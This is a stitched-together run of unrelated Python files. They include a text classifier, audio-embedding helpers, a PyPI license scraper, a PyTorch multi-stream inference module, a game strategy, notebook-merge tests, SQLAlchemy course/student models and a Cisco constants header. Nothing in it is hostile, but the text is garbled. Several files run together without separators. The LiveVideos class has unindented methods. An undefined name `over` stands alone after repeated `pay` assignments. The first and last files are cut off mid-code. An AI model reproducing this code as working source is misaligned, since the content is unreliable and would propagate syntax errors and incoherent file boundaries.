        self.fit(corpus, selector=selector)
        return self.transform(corpus, selector=selector)

    def summarize(self, corpus: Corpus, selector: Callable[[CorpusObject], bool] = lambda x: True):
        """
        Generate a DataFrame indexed by object id with the classifier predictions and scores

        :param corpus: the annotated Corpus
        :param selector: a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
        :return: a pandas DataFrame
        """
        objId_clf_prob = []
        for obj in corpus.iter_objs(self.obj_type, selector):
            objId_clf_prob.append((obj.id, obj.meta[self.clf_feat_name], obj.meta[self.clf_prob_feat_name]))
        # Sorted by prediction score, highest first.
        return pd.DataFrame(list(objId_clf_prob),
                            columns=['id', self.clf_feat_name, self.clf_prob_feat_name])\
                            .set_index('id').sort_values(self.clf_prob_feat_name, ascending=False)

    def summarize_objs(self, objs: List[CorpusObject]):
        """
        Generate a pandas DataFrame (indexed by object id, with prediction and prediction score columns) of classification results.

        Runs on a list of Corpus objects.

        :param objs: list of Corpus objects
        :return: pandas DataFrame indexed by Corpus object id
        """
        # NOTE(review): unlike summarize(), this sorts ascending — confirm
        # whether the asymmetry is intentional.
        objId_clf_prob = []
        for obj in objs:
            objId_clf_prob.append((obj.id, obj.meta[self.clf_feat_name], obj.meta[self.clf_prob_feat_name]))
        return pd.DataFrame(list(objId_clf_prob),
                            columns=['id', self.clf_feat_name, self.clf_prob_feat_name]).set_index('id').sort_values(self.clf_prob_feat_name)

    def evaluate_with_train_test_split(self, corpus: Corpus = None,
                                       objs: List[CorpusObject] = None,
                                       selector: Callable[[CorpusObject], bool] = lambda x: True,
                                       test_size: float = 0.2):
        """
        Evaluate the performance of predictive features (Classifier.pred_feats) in predicting for the label,
        using a train-test split.

        Run either on a Corpus (with Classifier labeller, selector, obj_type settings) or a list of Corpus objects

        :param corpus: target Corpus
        :param objs: target list of Corpus objects
        :param selector: if running on a Corpus, this is a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
        :param test_size: size of test set
        :return: accuracy and confusion matrix
        """
        X, y = extract_feats_and_label_bow(corpus, objs, self.obj_type, self.vector_name, self.labeller, selector)
        print("Running a train-test-split evaluation...")
        X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size)
        self.clf.fit(X_train, y_train)
        preds = self.clf.predict(X_test)
        accuracy = np.mean(preds == y_test)
        print("Done.")
        return accuracy, confusion_matrix(y_true=y_test, y_pred=preds)

    def evaluate_with_cv(self, corpus: Corpus = None,
                         objs: List[CorpusObject] = None,
                         cv=KFold(n_splits=5),
                         selector: Callable[[CorpusObject], bool] = lambda x: True
                         ):
        """
        Evaluate the performance of predictive features (Classifier.pred_feats) in predicting for the label,
        using cross-validation for data splitting.

        Run either on a Corpus (with Classifier labeller, selector, obj_type settings) or a list of Corpus objects.

        :param corpus: target Corpus
        :param objs: target list of Corpus objects (do not pass in corpus if using this)
        :param cv: cross-validation model to use: KFold(n_splits=5) by default.
        :param selector: if running on a Corpus, this is a (lambda) function that takes a Corpus object and returns True or False (i.e. include / exclude). By default, the selector includes all objects of the specified type in the Corpus.
        :return: cross-validated accuracy score
        """
        X, y = extract_feats_and_label_bow(corpus, objs, self.obj_type, self.vector_name, self.labeller, selector)
        print("Running a cross-validated evaluation...")
        score = cross_val_score(self.clf, X, y, cv=cv)
        print("Done.")
        return score
|
"""
Utility functions for hear-kit
"""
import numpy as np
from tqdm import tqdm
from typing import Tuple
import torch
import torch.nn.functional as F
from torch import Tensor
def compute_scene_stats(audios, to_melspec):
    """Average the log-mel-spectrogram mean and std over a collection of audios.

    Parameters
    ----------
    audios : iterable of Tensor
        Audio waveforms.
    to_melspec : callable
        Transform that converts a waveform into a mel-spectrogram.

    Returns
    -------
    list of two floats: the mean and std, each averaged over all clips.
    """
    eps = torch.finfo(torch.float).eps  # avoid log(0)
    total_mean = 0.
    total_std = 0.
    for clip in audios:
        log_mel = (to_melspec(clip) + eps).log()
        total_mean += log_mel.mean()
        total_std += log_mel.std()
    clip_count = len(audios)
    return [(total_mean / clip_count).item(), (total_std / clip_count).item()]
def compute_timestamp_stats(melspec):
    """Compute statistics of the mel-spectrograms.

    Parameters
    ----------
    melspec : Tensor of shape (n_sounds*n_frames, n_mels, time)

    Returns
    -------
    list containing the mean and the standard deviation of the
    mel-spectrograms, each divided by the first-dimension length.

    NOTE(review): dividing the global mean/std by len(melspec) is unusual
    for normalization statistics — confirm this scaling is intended.
    """
    scale = len(melspec)
    scaled_mean = melspec.mean() / scale
    scaled_std = melspec.std() / scale
    return [scaled_mean.item(), scaled_std.item()]
def frame_audio(
    audio: Tensor, frame_size: int, hop_size: float, sample_rate: int
) -> Tuple[Tensor, Tensor]:
    """
    Adapted from https://github.com/neuralaudio/hear-baseline/hearbaseline/

    Slices input audio into frames that are centered and occur every
    sample_rate * hop_size samples. We round to the nearest sample.

    Args:
        audio: input audio, expects a 2d Tensor of shape:
            (n_sounds, num_samples)
        frame_size: the number of samples each resulting frame should be
        hop_size: hop size between frames, in milliseconds
        sample_rate: sampling rate of the input audio

    Returns:
        - A Tensor of shape (n_sounds, num_frames, frame_size)
        - A Tensor of timestamps corresponding to the frame centers with shape:
            (n_sounds, num_frames).
    """
    # Pad half a frame of zeros on each side so every frame is centered on
    # its timestamp.
    left_pad = frame_size // 2
    audio = F.pad(audio, (left_pad, frame_size - left_pad))
    padded_len = audio.shape[1]

    step = hop_size / 1000.0 * sample_rate  # hop, in (fractional) samples
    frames = []
    timestamps = []
    frame_idx = 0
    start = 0
    end = frame_size
    while True:
        frames.append(audio[:, start:end])
        timestamps.append(frame_idx * step / sample_rate * 1000.0)
        # Advance to the next frame; stop once it would overrun the padding.
        frame_idx += 1
        start = int(round(frame_idx * step))
        end = start + frame_size
        if end > padded_len:
            break

    # Broadcast the timestamps to one row per sound.
    ts = torch.tensor(timestamps, dtype=torch.float32).expand(audio.shape[0], -1)
    return torch.stack(frames, dim=1), ts
def generate_byols_embeddings(
        model,
        audios,
        to_melspec,
        normalizer):
    """
    Generate audio embeddings from a pretrained feature extractor.

    Each audio is converted to a normalized log-mel-spectrogram and passed
    through the (frozen) model; the per-audio embeddings are concatenated.

    Adapted from https://github.com/google-research/google-research/tree/master/non_semantic_speech_benchmark

    Parameters
    ----------
    model : torch.nn.Module object or a tensorflow "trackable" object
        Model loaded with pre-training weights
    audios : list
        List of audios, loaded as a numpy arrays
    to_melspec : torchaudio.transforms.MelSpectrogram object
        Mel-spectrogram transform to create a spectrogram from an audio signal
    normalizer : nn.Module
        Pre-normalization transform

    Returns
    ----------
    embeddings: Tensor
        2D Array of embeddings for each audio of size (N, M). N = number of samples, M = embedding dimension
    """
    model.eval()
    # Freeze the extractor so no gradient state is tracked.
    for param in model.parameters():
        param.requires_grad = False

    eps = torch.finfo(torch.float).eps  # avoid log(0)
    outputs = []
    with torch.no_grad():
        for wav in tqdm(audios, desc='Generating Embeddings...', total=len(audios)):
            spec = (to_melspec(wav.unsqueeze(0)) + eps).log()
            batch = normalizer(spec).unsqueeze(0)
            # Run on the same device the audio lives on.
            outputs.append(model(batch.to(wav.device)))
    return torch.cat(outputs, dim=0)
# Program that uses a list called "numeros" and two functions, sorteia() and somaPar(). The first function
# draws 5 random numbers and puts them into the list, and the second function shows the sum of all the even
# values drawn by the first one.
from random import randint
numerossorteados = []  # NOTE(review): re-initialized again in the main program below before any use — this assignment appears redundant
def sorteia(numerossorteados):
    """Draw five random integers in [1, 10], appending each to the given list."""
    print(f'Sorteando 5 valores na lista: ', end='')
    for _ in range(5):
        valor = randint(1, 10)
        numerossorteados.append(valor)
        print(f'{valor} ', end='')
    print('PRONTO!')
def somapar(numerossorteados):
    """Print the sum of the even values in the given list."""
    soma = sum(valor for valor in numerossorteados if valor % 2 == 0)
    print(f'O resultado da soma dos pares é: {soma}')
# Main program
numerossorteados = []  # list shared by both functions
sorteia(numerossorteados)  # fill the list with 5 random values
somapar(numerossorteados)  # report the sum of the even ones
|
import json
import requests
import bs4
def get_license(package):
    """Scrape pypi.org for the license string of *package*.

    Returns the text following "License:" on the project page, or None when
    no such paragraph is found.
    """
    package = package.lower()
    response = requests.get('https://pypi.org/project/' + package)
    soup = bs4.BeautifulSoup(response.text, features="html.parser")
    for paragraph in soup.find_all('p'):
        text = paragraph.get_text()
        if "License:" in text:
            return text.replace('License: ', '')
def merge_python_output():
    """Merge pip-reported licenses into the final license list.

    Reads python_license_list.csv; lines whose license is NONE/UNKNOWN are
    retried by scraping pypi.org via get_license(). Packages that still fail
    are appended to a distro-dependent remainder file for later processing.
    """
    with open('python_license_list.csv') as file:
        lines = file.readlines()
    with open('DistroName') as file:
        name = file.read().strip()
    # The distro decides where unresolved packages are recorded.
    if name == 'centos' or name == 'fedora':
        file_name = 'final_output/remaining_list.csv'
    else:
        file_name = 'input_package_list.csv'
    for line in lines:
        if "---" in line:  # skip separator rows
            continue
        # Split once instead of twice per line.
        fields = line.split(',')
        package_name, license_name = fields[0].strip(), fields[1].strip()
        with open('final_output/Final_license_list.csv', 'a+') as file:
            with open(file_name, 'a') as rfile:
                if license_name in ["NONE", "UNKNOWN"]:
                    # pip did not know the license; try scraping PyPI instead.
                    try:
                        license_name = get_license(package_name)
                        file.write(package_name + " | | " + license_name + "|pypi.org | NA| NA\n")
                    except Exception:
                        # Narrowed from a bare `except:` so KeyboardInterrupt /
                        # SystemExit propagate; record the package for retry.
                        rfile.write(package_name + "\n")
                else:
                    file.write(package_name + " | | " + license_name + "| pip_command | NA| NA\n")
|
import torch
import torch.nn as nn
import intel_extension_for_pytorch as ipex
from .cpupool import CPUPool
class MultiStreamModule(nn.Module):
    r"""
    MultiStreamModule supports inference with multi-stream throughput mode.

    If the number of cores inside ``cpu_pool`` is divisible by ``num_streams``,
    the cores will be allocated equally to each stream.

    If the number of cores inside ``cpu_pool`` is not divisible by
    ``num_streams`` with remainder N, one extra core will be allocated to the
    first N streams.

    Args:
        model (torch.jit.ScriptModule or torch.nn.Module): The input model.
        num_streams (int): Number of instances.
        cpu_pool (intel_extension_for_pytorch.cpu.runtime.CPUPool): An
            intel_extension_for_pytorch.cpu.runtime.CPUPool object, contains
            all CPU cores used to run multi-stream inference.
        concat_output (bool): A flag indicates whether the output of each
            stream will be concatenated or not. The default value is True. Note:
            if the output of each stream can't be concatenated, set this flag to
            false to get the raw output (a list of each stream's output).

    Returns:
        intel_extension_for_pytorch.cpu.runtime.MultiStreamModule: Generated
        intel_extension_for_pytorch.cpu.runtime.MultiStreamModule object.

    :meta public:
    """
    def __init__(self, model, num_streams: int, cpu_pool: CPUPool, concat_output: bool = True):
        super(MultiStreamModule, self).__init__()
        assert type(cpu_pool) is CPUPool
        self.core_list = cpu_pool.core_ids
        self.num_streams = num_streams
        if self.num_streams == 1:
            # Sync execution path if num_stream is 1.
            self.model = model
        else:
            # Split the core list into contiguous slices, one per stream.
            self.cores_per_instance = self.core_list.__len__() // self.num_streams
            num_stream_allocated_extra_core = self.core_list.__len__() % self.num_streams
            self.tasks = []
            start_core_list_idx = 0
            end_core_list_idx = 0
            for j in range(self.num_streams):
                if j < num_stream_allocated_extra_core:
                    # If the core number is not divisible by stream number,
                    # the remainder streams(num_stream_allocated_extra_core) will be allocated one extra core.
                    end_core_list_idx += (self.cores_per_instance + 1)
                else:
                    end_core_list_idx += self.cores_per_instance
                # Each Task runs the model pinned to its own slice of cores.
                self.tasks.append(ipex.cpu.runtime.Task(model, ipex.cpu.runtime.CPUPool(self.core_list[start_core_list_idx:end_core_list_idx])))
                start_core_list_idx = end_core_list_idx
        self.concat_output = concat_output

    def forward(self, inputs):
        """Run inference, splitting `inputs` along dim 0 across the streams.

        Returns the concatenated per-stream outputs when `concat_output` is
        True, otherwise the list of raw per-stream outputs.
        """
        if self.num_streams == 1:
            # Sync execution path if num_stream is 1
            if not ipex._C.is_same_core_affinity_setting(self.core_list):
                # If the main thread's core affinity has been changed, we should set it again.
                ipex._C.pin_cpu_cores(self.core_list)
            results_raw = self.model(inputs)
            return results_raw if self.concat_output else [results_raw]
        # Ensure each instance has input offload
        batch_per_instance = inputs.size(0) // self.num_streams
        if batch_per_instance >= 1:
            # The input batchsize larger or equal to num_streams.
            used_num_streams = self.num_streams
            # If input batchsize larger than num_streams and not divisible,
            # the first remainder streams will have (mini_batch + 1) input size.
            instance_need_extra_input = inputs.size(0) % self.num_streams
        else:
            # The input batchsize less than num_streams,
            # only the first batchsize stream will have mini_batch(1) input.
            batch_per_instance = 1
            used_num_streams = inputs.size(0)
            instance_need_extra_input = 0
        results_raw_future = []
        results_raw = []
        start_idx = 0
        end_idx = 0
        # Submit each stream's slice of the batch asynchronously...
        for j in range(used_num_streams):
            if j < instance_need_extra_input:
                # Tail case, when the input image size larger than num_streams and not divisible,
                # the first remainder streams will have (mini_batch + 1) input size.
                end_idx = end_idx + (batch_per_instance + 1)
            else:
                # Input image size divisible of num_streams or input image size less than num_streams.
                end_idx = end_idx + batch_per_instance
            results_raw_future.append(self.tasks[j](inputs[start_idx:end_idx]))
            start_idx = end_idx
        # ...then block on every future in submission order.
        for j in range(used_num_streams):
            results_raw.append(results_raw_future[j].get())
        return torch.cat(results_raw) if self.concat_output else results_raw
|
from estrategias.jogadores import Jogador
from statistics import median
from random import choice
class MeuJogador(Jogador):
    """Hunt-game strategy: random choices early, then defect or cooperate
    based on food supply and the other players' reputations."""

    def escolha_de_cacada(self, rodada, comida_atual, reputacao_atual, m, reputacoes_dos_jogadores):
        """Return one 'd' (defect) / 'c' (cooperate) choice per other player.

        :param rodada: current round number
        :param comida_atual: current food stock
        :param reputacao_atual: this player's reputation (unused)
        :param m: threshold parameter of the round
        :param reputacoes_dos_jogadores: reputations of the other living players
        """
        media = sum(reputacoes_dos_jogadores) / len(reputacoes_dos_jogadores)
        vivos = len(reputacoes_dos_jogadores)
        mediana = median(reputacoes_dos_jogadores)
        if rodada < 100:
            # Early game: behave unpredictably.
            escolhas = [choice(['d', 'c']) for x in reputacoes_dos_jogadores]
        elif m <= vivos or comida_atual > 1500 or mediana > 0.49:
            # Comfortable position: defect against everyone.
            escolhas = ['d' for x in reputacoes_dos_jogadores]
        elif (comida_atual > 1000 and comida_atual < 1499) and media < 0.49:
            # Food getting scarce and low average reputation: cooperate.
            escolhas = ['c' for x in reputacoes_dos_jogadores]
        else:
            # Bug fix: previously no branch matched here (e.g. comida_atual
            # <= 1000 with low median), leaving `escolhas` unbound and
            # raising UnboundLocalError. Default to cooperating.
            escolhas = ['c' for x in reputacoes_dos_jogadores]
        return escolhas
pay = 1
pay = 2  # NOTE(review): each assignment overwrites the previous; only the last takes effect
pay = 3
over  # NOTE(review): `over` is not defined anywhere visible — this line raises NameError at runtime
|
import sqlite3 as sql
import sys
import cgi
import json
from flask import Flask, jsonify
app = Flask(__name__)
print("worked")  # debug trace
# Emit a CGI-style JSON content-type header followed by a blank line.
# NOTE(review): this script mixes Flask and raw CGI conventions — confirm
# which serving model is actually used.
sys.stdout.write("Content-Type: application/json")
sys.stdout.write("\n")
sys.stdout.write("\n")
form = cgi.FieldStorage()  # parse CGI form input from the request
print("worked")  # debug trace
#sys.stdout.write(json.dumps({ 'data': form.getvalue('ac_number')}))
with sql.connect('coursesys.db') as db:
    c = db.cursor()
    # Parameterized UPDATE assigning a student to a capstone team.
    addTeam = """UPDATE Capstone_Team_Members
SET Team_Number = ?
WHERE student_email = ?"""
    # c.execute(addTeam, (number[0],number[1]))
import os
import sys
import unittest
from tempfile import mkstemp
from nbformat import reads
from nbmerge import merge_notebooks, main, parse_plan, annotate_source_path
SELF_DIR = os.path.abspath(os.path.dirname(__file__))  # directory holding this test module
FIXTURES_DIR = os.path.join(SELF_DIR, "fixtures")  # notebook fixtures live here
# The three fixture notebooks merged by most tests, in their intended order.
TARGET_NBS = [os.path.join(FIXTURES_DIR, file_name + ".ipynb")
              for file_name in ("1_Intro", "2_Middle", "3_Conclusion")]
def file_names_from(file_paths):
    """Strip directories from each path, keeping only the base file names."""
    return [os.path.basename(path) for path in file_paths]
class TestMerge(unittest.TestCase):
    """Tests for nbmerge's notebook merging, plan parsing, source-path
    annotation, and CLI entry point."""

    def setUp(self):
        # The stdout-inspection tests require the runner's buffered mode,
        # where sys.stdout is replaced with a StringIO-like object.
        if not hasattr(sys.stdout, "getvalue"):
            self.fail("need to run in buffered mode")

    def _validate_merged_three(self, merged):
        """Assert that *merged* is the expected merge of the three fixtures."""
        self.assertEqual(len(merged.cells), 6)
        self.assertEqual(merged.metadata['test_meta']['title'], "Page 1")
        self.assertEqual(merged.metadata['final_answer'], 42)

    def test_merge_defaults(self):
        self._validate_merged_three(merge_notebooks(FIXTURES_DIR, TARGET_NBS))

    def test_merge_verbose(self):
        nb = merge_notebooks(FIXTURES_DIR, TARGET_NBS, verbose=True)
        self._validate_merged_three(nb)
        # Verbose mode logs a header line plus one "Reading" line per input.
        lines = sys.stdout.getvalue().splitlines()
        self.assertEqual(lines[0].strip(), "Merging notebooks...")
        for target, line in zip(TARGET_NBS, lines[1:4]):
            self.assertEqual(line.strip(), "Reading `{}`".format(target))

    def test_merge_with_boundary_key(self):
        nb = merge_notebooks(FIXTURES_DIR, TARGET_NBS, boundary_key='xxx')
        self._validate_merged_three(nb)
        # Each source notebook's first cell is tagged with its file name.
        self.assertEqual(nb.cells[0].metadata['xxx'], '1_Intro.ipynb')
        self.assertEqual(nb.cells[2].metadata['xxx'], '2_Middle.ipynb')
        self.assertEqual(nb.cells[4].metadata['xxx'], '3_Conclusion.ipynb')

    def test_parse_plan(self):
        header_nb = os.path.join(FIXTURES_DIR, "Header.ipynb")
        plan = parse_plan([header_nb,
                           "-o", "myfile.ipynb",
                           "-p", "(_|1|2)_.*",
                           "-i", "-r", "-v"])
        self.assertEqual(file_names_from(plan['notebooks']),
                         ["Header.ipynb", "1_Intro.ipynb",
                          "1_Intro_In_Sub.ipynb", "2_Middle.ipynb"])
        self.assertTrue(plan["verbose"])
        self.assertEqual(plan["output_file"], "myfile.ipynb")
        # A nonexistent explicit notebook path must raise.
        with self.assertRaises(IOError):
            parse_plan(["this-file-doesn't-exist"])

    def test_annotate_source_path(self):
        nb_path = os.path.join(FIXTURES_DIR, "1_Intro.ipynb")
        with open(nb_path, "r") as fp:
            nb = reads(fp.read(), as_version=4)
        annotate_source_path(nb, SELF_DIR, nb_path, "xylophone")
        # The annotation stores the path relative to the base directory.
        self.assertEqual(nb.cells[0].metadata['xylophone'],
                         os.path.join('fixtures', '1_Intro.ipynb'))

    def test_main_to_stdout(self):
        main(TARGET_NBS)
        self._validate_merged_three(reads(sys.stdout.getvalue(), as_version=4))

    def test_main_to_file(self):
        _, path = mkstemp()
        try:
            main(TARGET_NBS + ["-o", path])
            with open(path) as fp:
                self._validate_merged_three(reads(fp.read(), as_version=4))
        finally:
            # Bug fix: this was `except: os.unlink(path)` — a bare except
            # that swallowed any assertion failure and leaked the temp file
            # on success. Always clean up and let exceptions propagate.
            os.unlink(path)
|
#!/usr/bin/env python3
"""PyTest tests for the get_datatype.py module.
"""
import os
import sys
sys.path.append(os.path.join(os.path.dirname(sys.path[0]),'amoebaelib')) # Customize.
from data.datatype_test_seqs import testseq1
from get_datatype import \
get_datatype_for_sequence_string, \
get_dbtype
def test_get_datatype_for_sequence_string():
    """Test the get_datatype_for_sequence_string function in the get_datatype.py file."""
    ##########################
    # Arrange: (sequence, expected datatype) pairs.
    cases = [
        ('ATGC' * 3 + 'Y', 'nucl'),
        ('atgc' * 3 + 'y', 'nucl'),
        ('ATGCV', 'prot'),
        ('atgcv', 'prot'),
        ('tccaaaaaatcgaaTTATYttattccccaccttcttttctcattttttga', 'nucl'),
        (testseq1, 'nucl'),
    ]
    ##########################
    # Act + Assert.
    for sequence, expected in cases:
        assert get_datatype_for_sequence_string(sequence) == expected
def test_get_dbtype():  # ***Incomplete test
    """Placeholder test for the get_dbtype function in the get_datatype.py file."""
    ##########################
    # Arrange.
    f = "f"
    ##########################
    # Act.
    #x = get_dbtype(f)
    ##########################
    # Assert (trivially true until a real assertion is written).
    assert True  # ***Temporary.
|
from ..resource import Resource
class LiveVideos(Resource):
def find(self, live_video_id:str):
return self._get(f"live_videos/{live_video_id}")
def all(self, applicant_id:str):
payload = {"applicant_id": applicant_id}
return self._get("live_videos/", payload=payload)
def download(self, live_video_id:str):
return self._download_request(f"live_videos/{live_video_id}/download")
def download_frame(self, live_video_id:str):
return self._download_request(f"live_videos/{live_video_id}/frame") |
# 함수로 정수 올림 한 값 리턴하기
x = float(input())  # read a real number from stdin
def f(key):
    """Return the ceiling of *key* as an int.

    Uses the floor-division identity ceil(x) == -floor(-x), so no math
    import is needed.
    """
    return -int(-key // 1)
print(f(x))  # print the rounded-up value
print(f(x))  # NOTE(review): printed a second time — the duplicate looks unintentional
from .shared import db
# --- Many-to-many association tables ---

# Student <-> Skill, with a per-pair integer rating.
student_skill = db.Table(
    'student_skill', db.Model.metadata,
    db.Column('rating', db.Integer, nullable=False),
    db.Column('student_id', db.Integer, db.ForeignKey('student.id'), nullable=False),
    db.Column('skill_id', db.Integer, db.ForeignKey('skill.id'), nullable=False)
)

# Course <-> Skill.
course_skill = db.Table(
    'course_skill', db.Model.metadata,
    db.Column('course_id', db.Integer, db.ForeignKey('course.id'), nullable=False),
    db.Column('skill_id', db.Integer, db.ForeignKey('skill.id'), nullable=False)
)

# Company <-> Skill.
company_skill = db.Table(
    'company_skill', db.Model.metadata,
    db.Column('company_id', db.Integer, db.ForeignKey('company.id'), nullable=False),
    db.Column('skill_id', db.Integer, db.ForeignKey('skill.id'), nullable=False)
)

# Project <-> Skill.
project_skill = db.Table(
    'project_skill', db.Model.metadata,
    db.Column('project_id', db.Integer, db.ForeignKey('project.id'), nullable=False),
    db.Column('skill_id', db.Integer, db.ForeignKey('skill.id'), nullable=False)
)

# Student <-> Course enrollment.
student_course = db.Table(
    'student_course', db.Model.metadata,
    db.Column('student_id', db.Integer, db.ForeignKey('student.id'), nullable=False),
    db.Column('course_id', db.Integer, db.ForeignKey('course.id'), nullable=False)
)

# Student <-> Project membership.
student_project = db.Table(
    'student_project', db.Model.metadata,
    db.Column('student_id', db.Integer, db.ForeignKey('student.id'), nullable=False),
    db.Column('project_id', db.Integer, db.ForeignKey('project.id'), nullable=False)
)

# Company <-> Project sponsorship.
company_project = db.Table(
    'company_project', db.Model.metadata,
    db.Column('company_id', db.Integer, db.ForeignKey('company.id'), nullable=False),
    db.Column('project_id', db.Integer, db.ForeignKey('project.id'), nullable=False)
)
class Company(db.Model):
    """A company, with many-to-many links to skills and projects."""
    __tablename__ = 'company'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String())
    url = db.Column(db.String())       # company web page
    logo_url = db.Column(db.String())  # location of the company's logo image
    # Many-to-many relationships through the association tables above.
    skills = db.relationship('Skill', secondary=company_skill, backref=db.backref('companies', lazy='dynamic'))
    projects = db.relationship('Project', secondary=company_project, backref=db.backref('companies', lazy='dynamic'))

    def __init__(self, name, url, logo_url):
        self.name = name
        self.url = url
        self.logo_url = logo_url

    def __repr__(self):
        return '<Company %r>' % self.name
class University(db.Model):
    """A university, identified by name and location."""
    __tablename__ = 'university'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String())
    country = db.Column(db.String())
    state = db.Column(db.String())
    # Bug fix: a stray trailing backslash here joined this line with the
    # `def __init__` below into one statement, a SyntaxError.
    city = db.Column(db.String())

    def __init__(self, name, country, state, city):
        self.name = name
        self.country = country
        self.state = state
        self.city = city

    def __repr__(self):
        return '<University %r>' % self.name
class Professor(db.Model):
    """A professor affiliated with a university."""
    __tablename__ = 'professor'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String())
    university_id = db.Column(db.Integer, db.ForeignKey('university.id'))
    university = db.relationship('University')

    def __init__(self, name, university):
        self.name = name
        self.university = university

    def __repr__(self):
        return '<Professor %r>' % self.name
class Course(db.Model):
    """A course offered at a university, taught by a professor, with a
    project window and associated skills."""
    __tablename__ = 'course'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String())
    year = db.Column(db.CHAR(4))  # four-character year string
    description = db.Column(db.Text)
    projects_start_date = db.Column(db.Date)
    projects_end_date = db.Column(db.Date)
    university_id = db.Column(db.Integer, db.ForeignKey('university.id'))
    professor_id = db.Column(db.Integer, db.ForeignKey('professor.id'))
    university = db.relationship('University')
    professor = db.relationship('Professor')
    skills = db.relationship('Skill', secondary=course_skill, backref=db.backref('courses', lazy='dynamic'))
    # students = db.relationship('Student', secondary=student_skill, backref=db.backref('courses', lazy='dynamic'))

    def __init__(self, name, year, description, projects_start_date, projects_end_date, university, professor):
        self.name = name
        # Bug fix: `year` was never stored — the original assigned
        # `self.university = university` twice instead.
        self.year = year
        self.description = description
        self.projects_start_date = projects_start_date
        self.projects_end_date = projects_end_date
        self.university = university
        self.professor = professor

    def __repr__(self):
        return '<Course %r>' % self.name
class Project(db.Model):
    """A course project with title, summary, details and an optional
    WordPress page."""
    __tablename__ = 'project'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    title = db.Column(db.String())
    summary = db.Column(db.Text)
    details = db.Column(db.Text)
    wordpress_url = db.Column(db.String())
    course_id = db.Column(db.Integer, db.ForeignKey('course.id'))
    course = db.relationship('Course')
    skills = db.relationship('Skill', secondary=project_skill, backref=db.backref('projects', lazy='dynamic'))
    # students = db.relationship('Student', secondary=student_project, backref=db.backref('projects', lazy='dynamic'))
    # companies = db.relationship('Company', secondary=company_project, backref=db.backref('projects', lazy='dynamic'))

    def __init__(self, title, summary, details, wordpress_url, course):
        self.title = title
        self.summary = summary
        self.details = details
        self.wordpress_url = wordpress_url
        self.course = course

    def __repr__(self):
        # BUG FIX: Project has no `name` attribute; the original
        # `self.name` raised AttributeError — use `title`.
        return '<Project %r>' % self.title
class Skill(db.Model):
    """A named skill belonging to a category."""
    __tablename__ = 'skill'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String())
    category = db.Column(db.String())

    def __init__(self, name, category):
        # BUG FIX: the original did `self.title = title` — `title` is not a
        # parameter of this constructor (NameError) and Skill has no title
        # column; the intent was clearly to store `name`.
        self.name = name
        self.category = category

    def __repr__(self):
        return '<Skill %r>' % self.name
class Student(db.Model):
    """A student with profile links, a start date, and many-to-many links
    to skills, courses and projects."""
    __tablename__ = 'student'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String())
    dob = db.Column(db.Date)
    linkedin_url = db.Column(db.String())
    github_url = db.Column(db.String())
    stackoverflow_url = db.Column(db.String())
    start_date = db.Column(db.Date)
    university_id = db.Column(db.Integer, db.ForeignKey('university.id'))
    university = db.relationship('University')
    skills = db.relationship('Skill', secondary=student_skill, backref=db.backref('students', lazy='dynamic'))
    courses = db.relationship('Course', secondary=student_course, backref=db.backref('students', lazy='dynamic'))
    projects = db.relationship('Project', secondary=student_project, backref=db.backref('students', lazy='dynamic'))

    def __init__(self, name, dob, linkedin_url, github_url, stackoverflow_url, start_date, university):
        """Populate all directly-settable student fields."""
        field_values = (('name', name), ('dob', dob),
                        ('linkedin_url', linkedin_url),
                        ('github_url', github_url),
                        ('stackoverflow_url', stackoverflow_url),
                        ('start_date', start_date),
                        ('university', university))
        for field, value in field_values:
            setattr(self, field, value)

    def __repr__(self):
        return f'<Student {self.name!r}>'
class Account(db.Model):
    """A login account; `role` determines which of the linked entities
    (company/professor/student/university) is relevant."""
    __tablename__ = 'account'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    username = db.Column(db.String())
    # NOTE(review): the password appears to be stored as-is (plain text) —
    # confirm, and consider hashing before this reaches production.
    password = db.Column(db.String())
    role = db.Column(db.String())
    company_id = db.Column(db.Integer, db.ForeignKey('company.id'))
    company = db.relationship('Company')
    professor_id = db.Column(db.Integer, db.ForeignKey('professor.id'))
    professor = db.relationship('Professor')
    student_id = db.Column(db.Integer, db.ForeignKey('student.id'))
    student = db.relationship('Student')
    university_id = db.Column(db.Integer, db.ForeignKey('university.id'))
    university = db.relationship('University')

    def __init__(self, username, password, role, company, professor, student, university):
        """Populate credentials, role, and all entity links."""
        names = ('username', 'password', 'role', 'company',
                 'professor', 'student', 'university')
        values = (username, password, role, company,
                  professor, student, university)
        for attr_name, attr_value in zip(names, values):
            setattr(self, attr_name, attr_value)

    def __repr__(self):
        return f'<Account {self.username!r}>'
|
"""
Copyright (c) 2020 Cisco Systems Inc or its affiliates.
All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--------------------------------------------------------------------------------
Name: constant.py
Purpose: This contains all system constants & descriptions
This gets called in all project files if necessary
"""
import os
import logging
# Module-level logger; DEBUG-level records may be globally disabled below
# depending on the DEBUG_DISABLED environment variable.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# Debug logs
try:
    # Any value other than the literal string 'true' (case-insensitive)
    # leaves debug logging enabled — same semantics as the original if/else.
    DEBUG_DISABLED = os.environ['DEBUG_DISABLED'].lower() == 'true'
    if DEBUG_DISABLED:
        # Suppress all DEBUG-level records process-wide.
        logging.disable(logging.DEBUG)
except Exception as e:
    logger.error("Env variable 'DEBUG_DISABLED' may not available")
    logger.debug(str(e))
    exit(0)
# Get Autoscale Group Name
try:
    # Required: name of the Auto Scaling group this function operates on.
    ASG_NAME = os.environ['ASG_NAME']
except Exception as e:
